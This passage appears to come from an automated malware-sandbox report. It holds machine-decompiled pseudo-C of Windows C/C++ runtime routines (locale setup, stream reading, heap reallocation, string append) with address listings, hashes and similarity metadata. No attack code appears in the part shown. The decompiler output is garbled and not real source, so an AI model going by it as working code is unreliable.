							return E0030A980(0x331ae8 + _t45 * 0x18, _t47);
						}
						return _t45;
					} else {
						return E00310BAA(0xc);
					}
				} else {
					E00308748(_t58, _t64, __ecx, _t79, __ecx, _t33);
					return _t66;
				}
			}





















                                            0x003011c3
                                            0x003011c9
                                            0x003011cb
                                            0x003011d0
                                            0x003011d9
                                            0x003011dd
                                            0x003011e4
                                            0x003011e8
                                            0x003011ec
                                            0x003011f3
                                            0x003011f6
                                            0x003011fa
                                            0x003011fd
                                            0x00301200
                                            0x00301203
                                            0x00301206
                                            0x00301209
                                            0x0030120b
                                            0x00301223
                                            0x0030122b
                                            0x0030122e
                                            0x0030123b
                                            0x00301243
                                            0x00301248
                                            0x00301249
                                            0x0030124a
                                            0x0030124b
                                            0x0030124c
                                            0x0030124d
                                            0x0030124e
                                            0x0030124f
                                            0x00301250
                                            0x00301251
                                            0x00301254
                                            0x00301259
                                            0x0030125c
                                            0x0030125f
                                            0x00301261
                                            0x00301264
                                            0x00301269
                                            0x00301269
                                            0x0030126c
                                            0x00301273
                                            0x00301276
                                            0x00301278
                                            0x0030127b
                                            0x00301280
                                            0x00301280
                                            0x00301283
                                            0x0030128a
                                            0x0030128d
                                            0x0030128f
                                            0x00301292
                                            0x00301297
                                            0x00301297
                                            0x0030129a
                                            0x003012a1
                                            0x003012a4
                                            0x003012a6
                                            0x003012a9
                                            0x003012ae
                                            0x003012ae
                                            0x003012b1
                                            0x003012b8
                                            0x003012bb
                                            0x003012bd
                                            0x003012c0
                                            0x003012c5
                                            0x003012c5
                                            0x003012c8
                                            0x003012cf
                                            0x003012d2
                                            0x003012d4
                                            0x003012d7
                                            0x003012dc
                                            0x003012df
                                            0x003012e6
                                            0x00309a52
                                            0x00309a54
                                            0x00309a56
                                            0x00309a61
                                            0x00309a64
                                            0x00309a69
                                            0x00309a69
                                            0x00000000
                                            0x00309a74
                                            0x00309a75
                                            0x00309a58
                                            0x00309a60
                                            0x00309a60
                                            0x0030120d
                                            0x0030120f
                                            0x0030121d
                                            0x0030121d

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 003011CB
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0030120F
                                              • Part of subcall function 00308748: _setlocale.LIBCMT ref: 0030874F
                                              • Part of subcall function 00308748: _Yarn.LIBCPMT ref: 00308767
                                              • Part of subcall function 00308748: _setlocale.LIBCMT ref: 00308777
                                              • Part of subcall function 00308748: _Yarn.LIBCPMT ref: 0030878B
                                            • std::exception::exception.LIBCMT ref: 0030122E
                                            • __CxxThrowException@8.LIBCMT ref: 00301243
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Yarn_setlocalestd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw__lockstd::exception::exception
                                            • String ID: bad locale name
                                            • API String ID: 601777697-1405518554
                                            • Opcode ID: 6bd5941fe545db7b371c8bf08ee2f41de8cf1f7ca12758689b38f6a72989fd21
                                            • Instruction ID: 3ca488e5ecdc024d0ae0556cb17203161a95b12bc18e2ca380ab069763a5a5e2
                                            • Opcode Fuzzy Hash: 6bd5941fe545db7b371c8bf08ee2f41de8cf1f7ca12758689b38f6a72989fd21
                                            • Instruction Fuzzy Hash: BC015EB05017489EC721DF75D455B8BBBF8AF24700F008A6EE889D7A81E774E208CBE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 003093AF, Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E003093AF(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				void* _t62;
				intOrPtr _t72;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t103;
				signed int* _t109;
				void* _t112;
				signed int _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				void* _t117;

				_t113 = __esi;
				_push(0x2c);
				E0030F5B3(E003247DE, __ebx, __edi, __esi);
				_t112 = __ecx;
				_t60 =  *((intOrPtr*)(__ecx + 0x1c));
				_t95 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))));
				if(_t95 == 0) {
					L3:
					_t93 = 0;
					__eflags =  *((intOrPtr*)(_t112 + 0x50));
					if( *((intOrPtr*)(_t112 + 0x50)) != 0) {
						E00308DE4(_t112);
						__eflags =  *((intOrPtr*)(_t112 + 0x40));
						if(__eflags != 0) {
							 *((intOrPtr*)(_t117 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t117 - 0x18)) = 0;
							 *((char*)(_t117 - 0x28)) = 0;
							_push( *((intOrPtr*)(_t112 + 0x50)));
							 *((intOrPtr*)(_t117 - 4)) = 0;
							_t62 = E00310141(0, _t112, _t113, __eflags);
							_t113 = _t113 | 0xffffffff;
							while(1) {
								__eflags = _t62 - _t113;
								if(_t62 == _t113) {
									break;
								}
								E00305FC0(_t62, _t117 - 0x28, 1, _t62);
								__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
								_t93 =  *((intOrPtr*)(_t117 - 0x28));
								if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
									 *((intOrPtr*)(_t117 - 0x34)) = _t117 - 0x28;
								} else {
									 *((intOrPtr*)(_t117 - 0x34)) = _t93;
								}
								__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
								if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
									_t93 = _t117 - 0x28;
								}
								_t72 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 0x40)))) + 0x18))(_t112 + 0x48, _t93,  *((intOrPtr*)(_t117 - 0x18)) +  *((intOrPtr*)(_t117 - 0x34)), _t117 - 0x30, _t117 - 0x29, _t117 - 0x28, _t117 - 0x38);
								__eflags = _t72;
								if(_t72 < 0) {
									L22:
									E00302DA0(_t117 - 0x28, 1, 0);
									L23:
									return E0030F571(_t93, _t112, _t113);
								} else {
									__eflags = _t72 - 1;
									if(_t72 <= 1) {
										__eflags =  *((intOrPtr*)(_t117 - 0x38)) - _t117 - 0x29;
										if( *((intOrPtr*)(_t117 - 0x38)) != _t117 - 0x29) {
											__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
											_t114 =  *((intOrPtr*)(_t117 - 0x28));
											if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
												_t114 = _t117 - 0x28;
											}
											_t77 =  *((intOrPtr*)(_t117 - 0x30));
											_t116 = _t114 - _t77 +  *((intOrPtr*)(_t117 - 0x18));
											__eflags = _t116;
											if(__eflags <= 0) {
												L21:
												_t113 =  *(_t117 - 0x29) & 0x000000ff;
												goto L22;
											} else {
												goto L34;
											}
											while(1) {
												L34:
												_push( *((intOrPtr*)(_t112 + 0x50)));
												_t116 = _t116 - 1;
												_push( *((char*)(_t116 + _t77)));
												E003108C1(_t93, _t112, _t116, __eflags);
												__eflags = _t116;
												if(__eflags <= 0) {
													goto L21;
												}
												_t77 =  *((intOrPtr*)(_t117 - 0x30));
											}
											goto L21;
										}
										__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
										_t103 =  *((intOrPtr*)(_t117 - 0x28));
										if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
											_t103 = _t117 - 0x28;
										}
										_t81 =  *((intOrPtr*)(_t117 - 0x30)) - _t103;
										__eflags = _t81;
										_push(_t81);
										E00304340(_t117 - 0x28, 0);
										L28:
										_push( *((intOrPtr*)(_t112 + 0x50)));
										_t62 = E00310141(_t93, _t112, _t113, __eflags);
										continue;
									}
									__eflags = _t72 - 3;
									if(_t72 != 3) {
										goto L22;
									}
									__eflags =  *((intOrPtr*)(_t117 - 0x18)) - 1;
									if(__eflags < 0) {
										goto L28;
									}
									__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
									_t83 =  *((intOrPtr*)(_t117 - 0x28));
									if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
										_t83 = _t117 - 0x28;
									}
									E00310931(_t117 - 0x29, 1, _t83, 1);
									goto L21;
								}
							}
							goto L22;
						}
						 *((char*)(_t117 - 0x2a)) = 0;
						_t60 = E00308847(__eflags, _t117 - 0x2a,  *((intOrPtr*)(_t112 + 0x50)));
						__eflags = _t60;
						if(_t60 == 0) {
							goto L4;
						}
						goto L23;
					}
					L4:
					goto L23;
				}
				_t109 =  *(__ecx + 0x2c);
				_t113 =  *_t109;
				_t60 = _t113 + _t95;
				if(_t95 >= _t113 + _t95) {
					goto L3;
				}
				 *_t109 = _t113 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) + 1;
				goto L23;
			}
















                                            0x003093af
                                            0x003093af
                                            0x003093b6
                                            0x003093bb
                                            0x003093bd
                                            0x003093c0
                                            0x003093c4
                                            0x003093e9
                                            0x003093e9
                                            0x003093eb
                                            0x003093ee
                                            0x003093fa
                                            0x003093ff
                                            0x00309402
                                            0x00309422
                                            0x00309429
                                            0x0030942c
                                            0x0030942f
                                            0x00309432
                                            0x00309435
                                            0x0030943a
                                            0x00309503
                                            0x00309504
                                            0x00309506
                                            0x00000000
                                            0x00000000
                                            0x00309448
                                            0x0030944d
                                            0x00309451
                                            0x00309454
                                            0x0030945e
                                            0x00309456
                                            0x00309456
                                            0x00309456
                                            0x00309461
                                            0x00309465
                                            0x00309467
                                            0x00309467
                                            0x0030948b
                                            0x0030948e
                                            0x00309490
                                            0x003094c3
                                            0x003094ca
                                            0x003094d1
                                            0x003094d6
                                            0x00309492
                                            0x00309492
                                            0x00309495
                                            0x003094da
                                            0x003094dd
                                            0x0030950e
                                            0x00309512
                                            0x00309515
                                            0x00309517
                                            0x00309517
                                            0x0030951a
                                            0x0030951f
                                            0x00309522
                                            0x00309524
                                            0x003094bf
                                            0x003094bf
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00309526
                                            0x00309526
                                            0x00309526
                                            0x00309529
                                            0x0030952e
                                            0x0030952f
                                            0x00309536
                                            0x00309538
                                            0x00000000
                                            0x00000000
                                            0x0030953a
                                            0x0030953a
                                            0x00000000
                                            0x00309526
                                            0x003094df
                                            0x003094e3
                                            0x003094e6
                                            0x003094e8
                                            0x003094e8
                                            0x003094ee
                                            0x003094ee
                                            0x003094f3
                                            0x003094f6
                                            0x003094fb
                                            0x003094fb
                                            0x003094fe
                                            0x00000000
                                            0x003094fe
                                            0x00309497
                                            0x0030949a
                                            0x00000000
                                            0x00000000
                                            0x0030949c
                                            0x003094a0
                                            0x00000000
                                            0x00000000
                                            0x003094a2
                                            0x003094a6
                                            0x003094a9
                                            0x003094ab
                                            0x003094ab
                                            0x003094b7
                                            0x00000000
                                            0x003094bc
                                            0x00309490
                                            0x00000000
                                            0x0030950c
                                            0x0030940a
                                            0x0030940e
                                            0x00309415
                                            0x00309417
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00309419
                                            0x003093f0
                                            0x00000000
                                            0x003093f0
                                            0x003093c6
                                            0x003093c9
                                            0x003093cb
                                            0x003093d0
                                            0x00000000
                                            0x00000000
                                            0x003093d5
                                            0x003093df
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog3__fgetc_ungetc
                                            • String ID:
                                            • API String ID: 1616942180-0
                                            • Opcode ID: 50b3694d6c57c57289e80139cafe20baa64552afe0d46024ee3625acf27da9ba
                                            • Instruction ID: b2d8c75461998410bd533c2ec1c970c470ba1206d77cc19f512f5d24ab3cfff4
                                            • Opcode Fuzzy Hash: 50b3694d6c57c57289e80139cafe20baa64552afe0d46024ee3625acf27da9ba
                                            • Instruction Fuzzy Hash: E1518471A0261ADFCF16DFA5C4A1AEDB7B4FF09310F14006AE501B75C2D771A985CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0031B46C, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E0031B46C(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x331e20, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x332ae0 - _t7;
								if(__eflags == 0) {
									_t9 = E0030E9C6(__eflags);
									 *_t9 = E0030E9D9(GetLastError());
									goto L17;
								} else {
									__eflags = E00316930(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E0030E9C6(__eflags);
										 *_t12 = E0030E9D9(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00316930(_t6, _t31);
						 *((intOrPtr*)(E0030E9C6(__eflags))) = 0xc;
						goto L12;
					} else {
						E0030DCB0(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0030FA82(__ebx, __edx, __edi, _a8);
				}
			}









                                            0x0031b473
                                            0x0031b481
                                            0x0031b484
                                            0x0031b486
                                            0x0031b495
                                            0x0031b4c8
                                            0x0031b4c8
                                            0x0031b4cb
                                            0x00000000
                                            0x00000000
                                            0x0031b498
                                            0x0031b49a
                                            0x0031b49c
                                            0x0031b49c
                                            0x0031b49c
                                            0x0031b4a9
                                            0x0031b4af
                                            0x0031b4b1
                                            0x0031b4b3
                                            0x0031b513
                                            0x0031b513
                                            0x0031b4b5
                                            0x0031b4b5
                                            0x0031b4bb
                                            0x0031b4fd
                                            0x0031b511
                                            0x00000000
                                            0x0031b4bd
                                            0x0031b4c4
                                            0x0031b4c6
                                            0x0031b4e5
                                            0x0031b4f9
                                            0x0031b4df
                                            0x0031b4df
                                            0x0031b4df
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031b4c6
                                            0x0031b4bb
                                            0x00000000
                                            0x0031b4e1
                                            0x0031b4ce
                                            0x0031b4d9
                                            0x00000000
                                            0x0031b488
                                            0x0031b48b
                                            0x0031b491
                                            0x0031b491
                                            0x0031b4e2
                                            0x0031b4e4
                                            0x0031b475
                                            0x0031b47f
                                            0x0031b47f

                                            APIs
                                            • _malloc.LIBCMT ref: 0031B478
                                              • Part of subcall function 0030FA82: __FF_MSGBANNER.LIBCMT ref: 0030FA99
                                              • Part of subcall function 0030FA82: __NMSG_WRITE.LIBCMT ref: 0030FAA0
                                              • Part of subcall function 0030FA82: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000001,00000050,00000050,?,0030D41B,00000001,00000000,00000050,00000050,?,0030D355,00309985,?), ref: 0030FAC5
                                            • _free.LIBCMT ref: 0031B48B
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocHeap_free_malloc
                                            • String ID:
                                            • API String ID: 2734353464-0
                                            • Opcode ID: 5cd0ff29c324bedf8fe28999ace01907df1ed2edc20cc5258a0b4509338e5ddb
                                            • Instruction ID: b7fb3d71c77b3dae2dc1a914f18a94df0192502c12f0b971ab95fdde433549b9
                                            • Opcode Fuzzy Hash: 5cd0ff29c324bedf8fe28999ace01907df1ed2edc20cc5258a0b4509338e5ddb
                                            • Instruction Fuzzy Hash: A911C632505225AFCB3B3FB5BC156DA7798AF0C3A1F11C929F9499E592DF3888C096D0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00302A40, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 248COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 51%
                                            			E00302A40(intOrPtr* __ecx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _v0;
				char _v20;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr _v64;
				char _v68;
				void* __ebp;
				intOrPtr _t63;
				signed int _t66;
				void* _t73;
				intOrPtr _t75;
				char* _t82;
				intOrPtr _t86;
				intOrPtr _t92;
				signed int _t99;
				signed int _t108;
				intOrPtr _t112;
				void* _t125;
				char _t126;
				intOrPtr* _t127;
				intOrPtr _t128;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t152;
				intOrPtr _t157;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr* _t163;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				intOrPtr* _t169;
				intOrPtr _t170;
				char _t171;
				intOrPtr _t172;
				void* _t174;
				signed int _t191;
				intOrPtr* _t192;
				intOrPtr* _t193;
				void* _t212;
				void* _t213;
				void* _t215;

				_t161 = _a8;
				_push(_t125);
				_t190 = __ecx;
				_t150 = _a4;
				_t63 =  *((intOrPtr*)(_t150 + 0x10));
				if(_t63 < _t161) {
					E0030999B(__eflags, "invalid string position");
					goto L23;
				} else {
					_t108 = _t63 - _t161;
					_t168 =  *((intOrPtr*)(__ecx + 0x10));
					_t125 =  <  ? _t108 : _a12;
					if((_t108 | 0xffffffff) - _t168 <= _t125) {
						L23:
						_push("string too long");
						E0030996D(__eflags);
						goto L24;
					} else {
						if(_t125 == 0) {
							L21:
							return _t190;
						} else {
							_push(_t170);
							_t170 = _t168 + _t125;
							if(_t170 > 0xfffffffe) {
								L24:
								_push("string too long");
								_t66 = E0030996D(__eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t212 = _t215;
								_push(_t125);
								_t126 = _v20;
								_push(_t190);
								_t191 = _t150;
								__eflags = _t126;
								if(_t126 == 0) {
									L37:
									_t162 =  *((intOrPtr*)(_t191 + 0x10));
									_t151 = _a4;
									__eflags = (_t66 | 0xffffffff) - _t162 - _t151;
									if(__eflags <= 0) {
										_push("string too long");
										E0030996D(__eflags);
										goto L57;
									} else {
										__eflags = _t151;
										if(_t151 == 0) {
											L55:
											return _t191;
										} else {
											_push(_t170);
											_t170 = _t162 + _t151;
											__eflags = _t170 - 0xfffffffe;
											if(__eflags > 0) {
												L57:
												_push("string too long");
												E0030996D(__eflags);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t212);
												_t213 = _t215;
												_push(_t126);
												_t127 = _v40;
												_push(_t191);
												_push(_t170);
												_t192 = _t151;
												_t152 = _v36;
												_t171 =  *((intOrPtr*)(_t127 + 0x10));
												__eflags = _t171 - _t152;
												if(__eflags < 0) {
													E0030999B(__eflags, "invalid string position");
													goto L83;
												} else {
													_t174 = _t171 - _t152;
													__eflags = _a4 - _t174;
													_t171 =  <  ? _a4 : _t174;
													__eflags = _t192 - _t127;
													if(_t192 != _t127) {
														__eflags = _t171 - 0xfffffffe;
														if(__eflags > 0) {
															goto L84;
														} else {
															_t75 =  *((intOrPtr*)(_t192 + 0x14));
															__eflags = _t75 - _t171;
															if(_t75 >= _t171) {
																__eflags = _t171;
																if(_t171 != 0) {
																	goto L67;
																} else {
																	 *((intOrPtr*)(_t192 + 0x10)) = _t171;
																	__eflags = _t75 - 0x10;
																	if(_t75 < 0x10) {
																		_t82 = _t192;
																		 *_t82 = 0;
																		return _t82;
																	} else {
																		 *((char*)( *_t192)) = 0;
																		return _t192;
																	}
																}
															} else {
																E00306290(_t192, _t171,  *((intOrPtr*)(_t192 + 0x10)));
																_t152 = _v0;
																__eflags = _t171;
																if(_t171 == 0) {
																	L81:
																	return _t192;
																} else {
																	L67:
																	__eflags =  *((intOrPtr*)(_t127 + 0x14)) - 0x10;
																	if( *((intOrPtr*)(_t127 + 0x14)) >= 0x10) {
																		_t127 =  *_t127;
																	}
																	__eflags =  *((intOrPtr*)(_t192 + 0x14)) - 0x10;
																	if( *((intOrPtr*)(_t192 + 0x14)) < 0x10) {
																		_t163 = _t192;
																	} else {
																		_t163 =  *_t192;
																	}
																	__eflags = _t171;
																	if(_t171 != 0) {
																		E0030EE10(_t163, _t127 + _t152, _t171);
																	}
																	__eflags =  *((intOrPtr*)(_t192 + 0x14)) - 0x10;
																	 *((intOrPtr*)(_t192 + 0x10)) = _t171;
																	if( *((intOrPtr*)(_t192 + 0x14)) < 0x10) {
																		 *((char*)(_t192 + _t171)) = 0;
																		goto L81;
																	} else {
																		 *((char*)( *_t192 + _t171)) = 0;
																		return _t192;
																	}
																}
															}
														}
													} else {
														_t86 = _t171 + _t152;
														__eflags =  *((intOrPtr*)(_t192 + 0x10)) - _t86;
														if(__eflags < 0) {
															L83:
															E0030999B(__eflags, "invalid string position");
															L84:
															_push("string too long");
															_t73 = E0030996D(__eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t213);
															__eflags = _v68;
															_push(_t192);
															_push(_t171);
															_t172 = _v64;
															_t193 = _t152;
															if(_v68 != 0) {
																__eflags =  *((intOrPtr*)(_t193 + 0x14)) - 0x10;
																if( *((intOrPtr*)(_t193 + 0x14)) >= 0x10) {
																	_push(_t127);
																	_t128 =  *_t193;
																	__eflags = _t172;
																	if(_t172 != 0) {
																		E0030EE10(_t193, _t128, _t172);
																		_t215 = _t215 + 0xc;
																	}
																	_t73 = L0030DF6A(_t128);
																}
															}
															 *((intOrPtr*)(_t193 + 0x10)) = _t172;
															 *((intOrPtr*)(_t193 + 0x14)) = 0xf;
															 *((char*)(_t172 + _t193)) = 0;
															return _t73;
														} else {
															__eflags =  *((intOrPtr*)(_t192 + 0x14)) - 0x10;
															 *((intOrPtr*)(_t192 + 0x10)) = _t86;
															if( *((intOrPtr*)(_t192 + 0x14)) < 0x10) {
																_push(_t152);
																 *((char*)(_t192 + _t86)) = 0;
																E00304340(_t192, 0);
																return _t192;
															} else {
																_push(_t152);
																 *((char*)( *_t192 + _t86)) = 0;
																E00304340(_t192, 0);
																return _t192;
															}
														}
													}
												}
											} else {
												_t92 =  *((intOrPtr*)(_t191 + 0x14));
												__eflags = _t92 - _t170;
												if(_t92 >= _t170) {
													__eflags = _t170;
													if(_t170 != 0) {
														goto L42;
													} else {
														 *((intOrPtr*)(_t191 + 0x10)) = _t170;
														__eflags = _t92 - 0x10;
														if(_t92 < 0x10) {
															_t99 = _t191;
															 *_t99 = 0;
															return _t99;
														} else {
															 *( *_t191) = 0;
															return _t191;
														}
													}
												} else {
													E00306290(_t191, _t170, _t162);
													_t151 = _a4;
													__eflags = _t170;
													if(_t170 == 0) {
														L54:
														goto L55;
													} else {
														L42:
														__eflags =  *((intOrPtr*)(_t191 + 0x14)) - 0x10;
														if( *((intOrPtr*)(_t191 + 0x14)) < 0x10) {
															_t166 = _t191;
														} else {
															_t166 =  *_t191;
														}
														__eflags = _t151;
														if(_t151 != 0) {
															__eflags =  *((intOrPtr*)(_t191 + 0x10)) + _t166;
															E0030EE10( *((intOrPtr*)(_t191 + 0x10)) + _t166, _t126, _t151);
														}
														__eflags =  *((intOrPtr*)(_t191 + 0x14)) - 0x10;
														 *((intOrPtr*)(_t191 + 0x10)) = _t170;
														if( *((intOrPtr*)(_t191 + 0x14)) < 0x10) {
															 *((char*)(_t191 + _t170)) = 0;
															goto L54;
														} else {
															 *((char*)( *_t191 + _t170)) = 0;
															return _t191;
														}
													}
												}
											}
										}
									}
								} else {
									_t157 =  *((intOrPtr*)(_t191 + 0x14));
									__eflags = _t157 - 0x10;
									if(_t157 < 0x10) {
										_t66 = _t191;
									} else {
										_t66 =  *_t191;
									}
									__eflags = _t126 - _t66;
									if(_t126 < _t66) {
										goto L37;
									} else {
										__eflags = _t157 - 0x10;
										if(_t157 < 0x10) {
											_t167 = _t191;
										} else {
											_t167 =  *_t191;
										}
										_t66 =  *((intOrPtr*)(_t191 + 0x10)) + _t167;
										__eflags = _t66 - _t126;
										if(_t66 <= _t126) {
											goto L37;
										} else {
											__eflags = _t157 - 0x10;
											if(_t157 < 0x10) {
												_push(_a4);
												__eflags = _t126 - _t191;
												return E00302A40(_t191, _t191, _t126 - _t191);
											} else {
												_push(_a4);
												__eflags = _t126 -  *_t191;
												return E00302A40(_t191, _t191, _t126 -  *_t191);
											}
										}
									}
								}
							} else {
								_t112 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t112 >= _t170) {
									__eflags = _t170;
									if(_t170 != 0) {
										goto L6;
									} else {
										 *((intOrPtr*)(__ecx + 0x10)) = _t170;
										__eflags = _t112 - 0x10;
										if(_t112 < 0x10) {
											 *((char*)(__ecx)) = 0;
											return __ecx;
										} else {
											 *((char*)( *__ecx)) = 0;
											return __ecx;
										}
									}
								} else {
									E00306290(__ecx, _t170, _t168);
									_t150 = _a4;
									if(_t170 == 0) {
										L20:
										goto L21;
									} else {
										L6:
										if( *((intOrPtr*)(_t150 + 0x14)) >= 0x10) {
											_t150 =  *_t150;
										}
										if( *((intOrPtr*)(_t190 + 0x14)) < 0x10) {
											_t169 = _t190;
										} else {
											_t169 =  *_t190;
										}
										if(_t125 != 0) {
											E0030EE10( *((intOrPtr*)(_t190 + 0x10)) + _t169, _a8 + _t150, _t125);
										}
										 *((intOrPtr*)(_t190 + 0x10)) = _t170;
										if( *((intOrPtr*)(_t190 + 0x14)) < 0x10) {
											 *((char*)(_t190 + _t170)) = 0;
											goto L20;
										} else {
											 *((char*)( *_t190 + _t170)) = 0;
											return _t190;
										}
									}
								}
							}
						}
					}
				}
			}













































                                            0x00302a43
                                            0x00302a46
                                            0x00302a48
                                            0x00302a4a
                                            0x00302a4d
                                            0x00302a52
                                            0x00302b1d
                                            0x00000000
                                            0x00302a58
                                            0x00302a5b
                                            0x00302a5d
                                            0x00302a62
                                            0x00302a6c
                                            0x00302b22
                                            0x00302b22
                                            0x00302b27
                                            0x00000000
                                            0x00302a72
                                            0x00302a74
                                            0x00302b10
                                            0x00302b15
                                            0x00302a7a
                                            0x00302a7a
                                            0x00302a7b
                                            0x00302a81
                                            0x00302b2c
                                            0x00302b2c
                                            0x00302b31
                                            0x00302b36
                                            0x00302b37
                                            0x00302b38
                                            0x00302b39
                                            0x00302b3a
                                            0x00302b3b
                                            0x00302b3c
                                            0x00302b3d
                                            0x00302b3e
                                            0x00302b3f
                                            0x00302b41
                                            0x00302b43
                                            0x00302b44
                                            0x00302b47
                                            0x00302b48
                                            0x00302b4a
                                            0x00302b4c
                                            0x00302ba5
                                            0x00302ba5
                                            0x00302bab
                                            0x00302bb0
                                            0x00302bb2
                                            0x00302c51
                                            0x00302c56
                                            0x00000000
                                            0x00302bb8
                                            0x00302bb8
                                            0x00302bba
                                            0x00302c49
                                            0x00302c4e
                                            0x00302bc0
                                            0x00302bc0
                                            0x00302bc1
                                            0x00302bc4
                                            0x00302bc7
                                            0x00302c5b
                                            0x00302c5b
                                            0x00302c60
                                            0x00302c65
                                            0x00302c66
                                            0x00302c67
                                            0x00302c68
                                            0x00302c69
                                            0x00302c6a
                                            0x00302c6b
                                            0x00302c6c
                                            0x00302c6d
                                            0x00302c6e
                                            0x00302c6f
                                            0x00302c70
                                            0x00302c71
                                            0x00302c73
                                            0x00302c74
                                            0x00302c77
                                            0x00302c78
                                            0x00302c79
                                            0x00302c7b
                                            0x00302c7e
                                            0x00302c81
                                            0x00302c83
                                            0x00302d77
                                            0x00000000
                                            0x00302c89
                                            0x00302c89
                                            0x00302c8b
                                            0x00302c8e
                                            0x00302c92
                                            0x00302c94
                                            0x00302cdd
                                            0x00302ce0
                                            0x00000000
                                            0x00302ce6
                                            0x00302ce6
                                            0x00302ce9
                                            0x00302ceb
                                            0x00302d11
                                            0x00302d13
                                            0x00000000
                                            0x00302d15
                                            0x00302d15
                                            0x00302d18
                                            0x00302d1b
                                            0x00302d2b
                                            0x00302d30
                                            0x00302d34
                                            0x00302d1d
                                            0x00302d20
                                            0x00302d28
                                            0x00302d28
                                            0x00302d1b
